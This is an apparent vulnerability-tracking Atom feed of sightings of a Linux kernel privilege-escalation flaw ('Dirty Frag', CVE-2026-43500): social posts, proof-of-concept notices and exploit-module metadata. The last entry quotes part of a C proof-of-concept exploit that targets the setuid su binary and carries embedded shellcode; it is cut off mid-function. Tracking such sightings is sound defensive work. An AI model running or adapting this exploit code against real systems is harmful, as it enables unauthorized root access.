<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://vulnerability.circl.lu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-05-27T19:38:11.440943+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@circl.lu</email>
  </author>
  <link href="https://vulnerability.circl.lu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the 10 most recent sightings.</subtitle>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/90ce62b7-9625-495f-8f5e-966b6e26e674/export</id>
    <title>90ce62b7-9625-495f-8f5e-966b6e26e674</title>
    <updated>2026-05-27T19:38:11.453807+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "90ce62b7-9625-495f-8f5e-966b6e26e674", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlwshvs3sk2v", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 90 interactions\nCVE-2026-43500: 71 interactions\nCVE-2026-42511: 56 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-42897: 36 interactions\nCVE-2026-20182: 13 interactions\nCVE-2026-42945: 12 interactions\n", "creation_timestamp": "2026-05-16T02:32:20.730258Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/90ce62b7-9625-495f-8f5e-966b6e26e674/export"/>
    <published>2026-05-16T02:32:20.730258+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/243d205f-1ee6-4f97-bc6e-98d92fc9a35d/export</id>
    <title>243d205f-1ee6-4f97-bc6e-98d92fc9a35d</title>
    <updated>2026-05-27T19:38:11.453736+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "243d205f-1ee6-4f97-bc6e-98d92fc9a35d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "published-proof-of-concept", "source": "Telegram/QUF9weJLwCd1qHdTEuhp0UyLZi4jvqqQc5vVfkezLkJSkiA", "content": "", "creation_timestamp": "2026-05-19T03:00:06.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/243d205f-1ee6-4f97-bc6e-98d92fc9a35d/export"/>
    <published>2026-05-19T03:00:06+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/d838d1a3-af9c-43b5-a058-b4c5a1728639/export</id>
    <title>d838d1a3-af9c-43b5-a058-b4c5a1728639</title>
    <updated>2026-05-27T19:38:11.453660+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "d838d1a3-af9c-43b5-a058-b4c5a1728639", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3mmbp6a4fv22r", "content": "\ud83d\udce2 Dirty Frag : deux vuln\u00e9rabilit\u00e9s Linux (CVE-2026-43284 et CVE-2026-43500) permettent une \u00e9l\u00e9vation de privil\u00e8ge\u2026\ud83d\udcdd \u2026\nhttps://cyberveille.ch/posts/2026-05-20-dirty-frag-deux-vulnerabilites-linux-cve-2026-43284-et-cve-2026-43500-permettent-une-elevation-de-privileges-root/ #CVE_2026_43284 #Cyberveil\u2026", "creation_timestamp": "2026-05-20T10:30:23.037492Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/d838d1a3-af9c-43b5-a058-b4c5a1728639/export"/>
    <published>2026-05-20T10:30:23.037492+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/2d295cf9-75fd-4e2c-879f-bc63061f6a8a/export</id>
    <title>2d295cf9-75fd-4e2c-879f-bc63061f6a8a</title>
    <updated>2026-05-27T19:38:11.453567+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "2d295cf9-75fd-4e2c-879f-bc63061f6a8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2026_43500_dirty_frag.rb", "content": "{\"actions\": [], \"aliases\": [], \"arch\": \"cmd\", \"author\": [\"Hyunwoo Kim\", \"Giovanni Heward\"], \"autofilter_ports\": [], \"autofilter_services\": [], \"check\": true, \"default_credential\": false, \"description\": \"CVE-2026-43500 exploits a memory-corruption vulnerability in the Linux kernel's RxRPC\\n          authentication subsystem (rxkad). When a crafted DATA packet is delivered to an AF_RXRPC\\n          socket configured with an attacker-controlled rxkad session key, the kernel's\\n          rxkad_verify_packet_1() function performs an in-place 8-byte pcbc(fcrypt) decryption\\n          directly on the page-cache page referenced by the splice offset. Because the decryption\\n          mutates the page in-place without marking it dirty, the corrupted in-memory view is\\n          immediately visible to all processes reading from the page cache. 
This allows a local\\n          attacker to corrupt the in-memory contents of a SUID binary and escalate privileges to root.\", \"disclosure_date\": \"2026-05-08\", \"fullname\": \"exploit/linux/local/cve_2026_43500_dirty_frag\", \"is_install_path\": true, \"mod_time\": \"2026-05-21 11:49:08 +0000\", \"name\": \"rxkad Page-Cache Write via CVE-2026-43500\", \"needs_cleanup\": true, \"notes\": {\"Reliability\": [\"repeatable-session\"], \"SideEffects\": [\"artifacts-on-disk\"], \"Stability\": [\"crash-os-down\"]}, \"path\": \"/modules/exploits/linux/local/cve_2026_43500_dirty_frag.rb\", \"platform\": \"Linux,Unix\", \"post_auth\": false, \"rank\": 400, \"ref_name\": \"linux/local/cve_2026_43500_dirty_frag\", \"references\": [\"CVE-2026-43500\", \"URL-https://github.com/V4bel/dirtyfrag\"], \"rport\": null, \"session_types\": [\"shell\", \"meterpreter\"], \"targets\": [\"Auto\"], \"type\": \"exploit\"}", "creation_timestamp": "2026-05-21T10:50:23.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/2d295cf9-75fd-4e2c-879f-bc63061f6a8a/export"/>
    <published>2026-05-21T10:50:23+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/0d3be26e-b73f-4a22-b512-12916fb7d21c/export</id>
    <title>0d3be26e-b73f-4a22-b512-12916fb7d21c</title>
    <updated>2026-05-27T19:38:11.453478+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "0d3be26e-b73f-4a22-b512-12916fb7d21c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/85248", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Dirtyfrag-go\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Koshmare-Blossom\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-21 15:55:35\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA Go implementation of dirtyfrag (CVE-2026-43284 / CVE-2026-43500)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-21T16:00:05.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/0d3be26e-b73f-4a22-b512-12916fb7d21c/export"/>
    <published>2026-05-21T16:00:05+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/bc9c8a97-42cd-4716-a5ea-f825887e81b4/export</id>
    <title>bc9c8a97-42cd-4716-a5ea-f825887e81b4</title>
    <updated>2026-05-27T19:38:11.453405+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "bc9c8a97-42cd-4716-a5ea-f825887e81b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "published-proof-of-concept", "source": "Telegram/pekQneQSghJS9ruSll4_086gjVL0B0HejJCeE2Ffiq4w67c", "content": "", "creation_timestamp": "2026-05-21T23:00:10.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/bc9c8a97-42cd-4716-a5ea-f825887e81b4/export"/>
    <published>2026-05-21T23:00:10+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/3509b0e6-24fa-4d1a-8eb8-32cfe41a18a1/export</id>
    <title>3509b0e6-24fa-4d1a-8eb8-32cfe41a18a1</title>
    <updated>2026-05-27T19:38:11.453326+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "3509b0e6-24fa-4d1a-8eb8-32cfe41a18a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyr4kgoa2u", "content": "\ud83d\udd17 CVE : CVE-2025-54518, CVE-2026-43284, CVE-2026-43500, CVE-2026-46300, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:18.413608Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/3509b0e6-24fa-4d1a-8eb8-32cfe41a18a1/export"/>
    <published>2026-05-22T13:05:18.413608+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/b0ae9072-c14f-4560-9285-70fb403d6338/export</id>
    <title>b0ae9072-c14f-4560-9285-70fb403d6338</title>
    <updated>2026-05-27T19:38:11.453223+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "b0ae9072-c14f-4560-9285-70fb403d6338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mmhyt66qb227", "content": "\u30a2\u30af\u30c6\u30a3\u30d6\u653b\u6483\uff1aLinux\u306eDirty Frag\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u4fb5\u5bb3\u5f8c\u306e\u30ea\u30b9\u30af\u304c\u62e1\u5927\n\n\u300cDirty Frag\u300d\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u3001\u65b0\u305f\u306b\u660e\u3089\u304b\u306b\u306a\u3063\u305fLinux\u306e\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001esp4\u3001esp6\uff08CVE-2026-43284\uff09\u3001rxrpc\uff08CVE-2026-43500\uff09\u306a\u3069\u306e\u8106\u5f31\u306a\u30ab\u30fc\u30cd\u30eb\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u304a\u3088\u3073\u30e1\u30e2\u30ea\u30d5\u30e9\u30b0\u30e1\u30f3\u30c8\u51e6\u7406\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3092\u4ecb\u3057\u3066\u3001\u6a29\u9650\u306e\u306a\u3044\u30e6\u30fc\u30b6\u30fc\u304b\u3089root\u6a29\u9650\u3078\u306e\u6607\u683c\u304c\u53ef\u80fd\u306b\u306a\u308a\u307e\u3059\u3002\u516c\u958b\u3055\u308c\u305f\u5831\u544a\u3084\u6982\u5ff5\u5b9f\u8a3c\u6d3b\u52d5\u304b\u3089\u3001\u3053\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u5f93\u6765\u306e\u7af6\u5408\u72b6\u614b\u306b\u4f9d\u5b58\u3059\u308bLinux\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\u624b\u6cd5\u3088\u308a\u3082\u4fe1\u983c\u6027\u306e\u9ad8\u3044\u6a29\u9650\u6607\u683c\u3092\u5b9f\u73fe\u3059\u308b\u3088\u3046\u306b\u8a2d\u8a08\u3055\u308c\u3066\u3044\u308b...", "creation_timestamp": "2026-05-22T22:39:13.177285Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/b0ae9072-c14f-4560-9285-70fb403d6338/export"/>
    <published>2026-05-22T22:39:13.177285+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/b5df876a-479b-42f9-a547-ba12cb3ca717/export</id>
    <title>b5df876a-479b-42f9-a547-ba12cb3ca717</title>
    <updated>2026-05-27T19:38:11.452469+00:00</updated>
    <author>
      <name>Joseph Lee</name>
      <uri>https://vulnerability.circl.lu/user/syspect</uri>
    </author>
    <content>{"uuid": "b5df876a-479b-42f9-a547-ba12cb3ca717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/control-systems-moxa-security-advisory-av26-509", "content": "", "creation_timestamp": "2026-05-26T05:59:13.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/b5df876a-479b-42f9-a547-ba12cb3ca717/export"/>
    <published>2026-05-26T05:59:13+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/a33a231b-aea3-4d29-9f58-276e517078f6/export</id>
    <title>a33a231b-aea3-4d29-9f58-276e517078f6</title>
    <updated>2026-05-27T19:38:11.450967+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "a33a231b-aea3-4d29-9f58-276e517078f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/spynika/9c98aca892e18aff2b87d04aa69cc7d7", "content": "#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef UDP_ENCAP\n#define UDP_ENCAP 100\n#endif\n#ifndef UDP_ENCAP_ESPINUDP\n#define UDP_ENCAP_ESPINUDP 2\n#endif\n#ifndef SOL_UDP\n#define SOL_UDP 17\n#endif\n\n#define ENC_PORT       4500\n#define SEQ_VAL        200\n#define REPLAY_SEQ     100\n#define PATCH_OFFSET   0\n#define PAYLOAD_LEN    192\n#define ENTRY_OFFSET   0x78\n#define TOTAL_SAS      (PAYLOAD_LEN / 4)\n#define SPI_BASE       0xDEADBE10u\n\nstatic const char *g_target = \"/usr/bin/su\";\nstatic unsigned char g_backup[PAYLOAD_LEN];\nstatic int g_have_backup = 0;\n\nstatic int g_tty = 0;\nstatic int g_verbose = 0;\nstatic int g_setuid_count = 0;\nstatic int g_exploitable_count = 0;\n\n/* first instructions of embedded shell ELF at file offset 0x78 */\nstatic const uint8_t su_marker[8] = {\n\t0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0, 0xb0, 0x6a,\n};\n\n#define C_RST  \"\\033[0m\"\n#define C_DIM  \"\\033[2m\"\n#define C_RED  \"\\033[31m\"\n#define C_GRN  \"\\033[32m\"\n#define C_YEL  \"\\033[33m\"\n#define C_BLU  \"\\033[34m\"\n#define C_MAG  \"\\033[35m\"\n#define C_CYN  \"\\033[36m\"\n#define C_WHT  \"\\033[1;37m\"\n#define C_BOLD \"\\033[1m\"\n\n#define C(x) (g_tty ? 
(x) : \"\")\n\nstatic void print_banner(void)\n{\n\tprintf(\"\\n\");\n\tprintf(\"%s\", C(C_CYN));\n\tprintf(\"  \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\");\n\tprintf(\"  \u2551  SLEY - CVE-2026-43284 dirtyfrag PoC  \u2551\\n\");\n\tprintf(\"  \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\");\n\tprintf(\"%s\\n\", C(C_RST));\n}\n\nstatic void status_line(const char *label, int ok, const char *detail)\n{\n\tprintf(\"  %s[%s]%s %-22s\",\n\t       C(C_DIM), ok ? \"+\" : \"-\", C(C_RST), label);\n\tif (detail &amp;amp;&amp;amp; detail[0])\n\t\tprintf(\" %s%s%s\", ok ? C(C_GRN) : C(C_RED), detail, C(C_RST));\n\tprintf(\"\\n\");\n}\n\nstatic void phase_header(int n, const char *title)\n{\n\tprintf(\"%s\u250c\u2500[%s phase %d%s] %s%s\\n\",\n\t       C(C_CYN), C(C_MAG), n, C(C_CYN), title, C(C_RST));\n}\n\nstatic int cfg_value_ok(const char *val, const char *expect)\n{\n\tif (!val || !*val)\n\t\treturn 0;\n\tif (strcmp(expect, \"ym\") == 0)\n\t\treturn val[0] == 'y' || val[0] == 'm';\n\treturn strcmp(val, expect) == 0;\n}\n\nstruct kconfig_req {\n\tconst char *key;\n\tconst char *expect;\n\tconst char *hint;\n\tchar val[32];\n\tint found;\n};\n\nstatic void scan_kconfig(FILE *f, struct kconfig_req *req, size_t nreq)\n{\n\tchar line[256];\n\n\tfor (size_t i = 0; i &amp;lt; nreq; i++) {\n\t\treq[i].val[0] = '\\0';\n\t\treq[i].found = 0;\n\t}\n\n\twhile (fgets(line, sizeof(line), f)) {\n\t\tfor (size_t i = 0; i &amp;lt; nreq; i++) {\n\t\t\tif (req[i].found)\n\t\t\t\tcontinue;\n\t\t\tsize_t klen = strlen(req[i].key);\n\t\t\tif (strncmp(line, req[i].key, klen) != 0 || 
line[klen] != '=')\n\t\t\t\tcontinue;\n\t\t\tconst char *v = line + klen + 1;\n\t\t\tsize_t n = strcspn(v, \"\\n\\r\");\n\t\t\tif (n &amp;gt;= sizeof(req[i].val))\n\t\t\t\tn = sizeof(req[i].val) - 1;\n\t\t\tmemcpy(req[i].val, v, n);\n\t\t\treq[i].val[n] = '\\0';\n\t\t\treq[i].found = 1;\n\t\t}\n\t}\n}\n\nstatic FILE *open_kconfig_gz(const char *src, int *via_popen)\n{\n\tstatic const char *cmds[] = {\n\t\t\"gzip -dc '%s' 2&amp;gt;/dev/null\",\n\t\t\"zcat '%s' 2&amp;gt;/dev/null\",\n\t\tNULL,\n\t};\n\tchar cmd[256];\n\n\tfor (int i = 0; cmds[i]; i++) {\n\t\tsnprintf(cmd, sizeof(cmd), cmds[i], src);\n\t\tFILE *f = popen(cmd, \"r\");\n\t\tif (f) {\n\t\t\t*via_popen = 1;\n\t\t\treturn f;\n\t\t}\n\t}\n\treturn NULL;\n}\n\nstatic FILE *open_kconfig_source(const char *release, char *label, size_t labellen,\n\t\t\t\t int *via_popen)\n{\n\tchar path[512];\n\tFILE *f;\n\n\t*via_popen = 0;\n\n\tsnprintf(path, sizeof(path), \"/boot/config-%s\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tsnprintf(path, sizeof(path), \"/lib/modules/%s/config\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tsnprintf(path, sizeof(path), \"/lib/modules/%s/build/.config\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tif (access(\"/proc/config.gz\", R_OK) == 0) {\n\t\tf = open_kconfig_gz(\"/proc/config.gz\", via_popen);\n\t\tif (f) {\n\t\t\tsnprintf(label, labellen, \"/proc/config.gz\");\n\t\t\treturn f;\n\t\t}\n\t}\n\n\treturn NULL;\n}\n\nstatic void close_kconfig(FILE *f, int via_popen)\n{\n\tif (!f)\n\t\treturn;\n\tif (via_popen)\n\t\tpclose(f);\n\telse\n\t\tfclose(f);\n}\n\nstatic int check_kernel_config(void)\n{\n\tstruct utsname uts;\n\tchar cfglabel[512];\n\tint via_popen = 0;\n\n\tif (uname(&amp;amp;uts) &amp;lt; 0) {\n\t\tstatus_line(\"uname\", 0, 
strerror(errno));\n\t\treturn -1;\n\t}\n\n\tphase_header(1, \"kernel config preflight\");\n\n\tFILE *cfg = open_kconfig_source(uts.release, cfglabel, sizeof(cfglabel), &amp;amp;via_popen);\n\tif (!cfg) {\n\t\tstatus_line(\"config file\", 0, \"not found under /boot, /lib/modules, /proc\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] WSL2: zcat /proc/config.gz | grep -E \\\"CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=\\\"%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr, \"%s  [!] or: grep -E \\\"...\\\" /boot/config-%s%s\\n\\n\",\n\t\t        C(C_YEL), uts.release, C(C_RST));\n\t\treturn -1;\n\t}\n\n\tprintf(\"  %s\u2192%s %s%s%s\\n\\n\", C(C_DIM), C(C_RST), C(C_BLU), cfglabel, C(C_RST));\n\tstatus_line(\"config file\", 1, via_popen ? \"via gzip/zcat\" : \"plain text\");\n\n\tstruct kconfig_req req[] = {\n\t\t{ \"CONFIG_USER_NS\",  \"y\",  \"required =y\" },\n\t\t{ \"CONFIG_XFRM\",     \"y\",  \"required =y\" },\n\t\t{ \"CONFIG_INET_ESP\", \"ym\", \"required =m or =y\" },\n\t};\n\tsize_t nreq = sizeof(req) / sizeof(req[0]);\n\tint ok_all = 1;\n\n\tscan_kconfig(cfg, req, nreq);\n\n\tfor (size_t i = 0; i &amp;lt; nreq; i++) {\n\t\tint ok = req[i].found &amp;amp;&amp;amp; cfg_value_ok(req[i].val, req[i].expect);\n\t\tchar detail[128];\n\t\tif (req[i].found)\n\t\t\tsnprintf(detail, sizeof(detail), \"= %s  (%s)\", req[i].val, req[i].hint);\n\t\telse\n\t\t\tsnprintf(detail, sizeof(detail), \"missing (%s)\", req[i].hint);\n\t\tstatus_line(req[i].key, ok, detail);\n\t\tif (!ok)\n\t\t\tok_all = 0;\n\t}\n\n\tclose_kconfig(cfg, via_popen);\n\n\tprintf(\"\\n\");\n\tif (!ok_all) {\n\t\tfprintf(stderr, \"%s  [!] kernel does not meet exploit requirements.%s\\n\", C(C_RED), C(C_RST));\n\t\tfprintf(stderr, \"%s  [!] 
manual check: zcat /proc/config.gz | grep -E \\\"CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=\\\"%s\\n\\n\",\n\t\t        C(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\tprintf(\"%s  kernel options OK.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n\nstatic void print_sysctl_val(const char *path, const char *name)\n{\n\tFILE *f = fopen(path, \"r\");\n\tif (!f)\n\t\treturn;\n\tchar val[64];\n\tif (!fgets(val, sizeof(val), f)) {\n\t\tfclose(f);\n\t\treturn;\n\t}\n\tval[strcspn(val, \"\\n\\r\")] = '\\0';\n\tprintf(\"      %s%s%s = %s\\n\", C(C_DIM), name, C(C_RST), val);\n\tfclose(f);\n}\n\nstatic int check_userns_runtime(void)\n{\n\tphase_header(2, \"user namespace runtime check\");\n\tprintf(\"  %s\u2192%s unshare(CLONE_NEWUSER | CLONE_NEWNET)%s\\n\\n\",\n\t       C(C_DIM), C(C_RST), C(C_DIM));\n\n\tif (getuid() == 0) {\n\t\tstatus_line(\"privilege\", 0, \"running as root \u2014 use an unprivileged user for LPE\");\n\t\tfprintf(stderr, \"\\n%s  [!] Exploit is meant to run as a normal user (uid != 0).%s\\n\\n\",\n\t\t        C(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\n\tpid_t pid = fork();\n\tif (pid &amp;lt; 0) {\n\t\tstatus_line(\"fork\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\tif (pid == 0) {\n\t\tif (unshare(CLONE_NEWUSER | CLONE_NEWNET) &amp;lt; 0)\n\t\t\t_exit(1);\n\t\t_exit(0);\n\t}\n\n\tint st;\n\tif (waitpid(pid, &amp;amp;st, 0) &amp;lt; 0) {\n\t\tstatus_line(\"waitpid\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\n\tint ok = WIFEXITED(st) &amp;amp;&amp;amp; WEXITSTATUS(st) == 0;\n\tif (!ok) {\n\t\tstatus_line(\"unshare\", 0, \"Operation not permitted\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] CONFIG_USER_NS=y in /boot/config does not guarantee unprivileged userns at runtime.%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] This host blocks user namespaces (common on hardened Ubuntu 22.04+ / enterprise VMs).%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] 
Changing the setuid target (su/sudo/pkexec) will not help \u2014 unshare must succeed first.%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tprintf(\"\\n  %sRelevant sysctls on this host:%s\\n\", C(C_DIM), C(C_RST));\n\t\tprint_sysctl_val(\"/proc/sys/kernel/apparmor_restrict_unprivileged_userns\",\n\t\t\t\t \"kernel.apparmor_restrict_unprivileged_userns\");\n\t\tprint_sysctl_val(\"/proc/sys/kernel/unprivileged_userns_clone\",\n\t\t\t\t \"kernel.unprivileged_userns_clone\");\n\t\tprint_sysctl_val(\"/proc/sys/user/max_user_namespaces\",\n\t\t\t\t \"user.max_user_namespaces\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] Lab only (as root): sysctl -w kernel.apparmor_restrict_unprivileged_userns=0%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] Without userns: this PoC cannot run (see CVE-2026-43500 rxrpc variant).%s\\n\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\n\tstatus_line(\"unshare\", 1, \"user+net namespace available\");\n\tprintf(\"%s  runtime userns check OK.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n\nstatic int skip_tree(const char *path)\n{\n\treturn strcmp(path, \"/proc\") == 0 ||\n\t       strcmp(path, \"/sys\") == 0 ||\n\t       strcmp(path, \"/dev\") == 0 ||\n\t       strcmp(path, \"/run\") == 0;\n}\n\nstatic int target_is_exploitable(const char *path)\n{\n\tstruct stat st;\n\n\tif (stat(path, &amp;amp;st) &amp;lt; 0 || !S_ISREG(st.st_mode))\n\t\treturn 0;\n\tif (!(st.st_mode &amp;amp; S_ISUID))\n\t\treturn 0;\n\tif (access(path, R_OK | X_OK) != 0)\n\t\treturn 0;\n\tint fd = open(path, O_RDONLY);\n\tif (fd &amp;lt; 0)\n\t\treturn 0;\n\tclose(fd);\n\treturn 1;\n}\n\nstatic int probe_target(const char *path, char *why, size_t whylen)\n{\n\tstruct stat st;\n\n\tif (stat(path, &amp;amp;st) &amp;lt; 0) {\n\t\tsnprintf(why, whylen, \"missing (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (!S_ISREG(st.st_mode)) {\n\t\tsnprintf(why, whylen, \"not a regular file\");\n\t\treturn -1;\n\t}\n\tif (!(st.st_mode &amp;amp; 
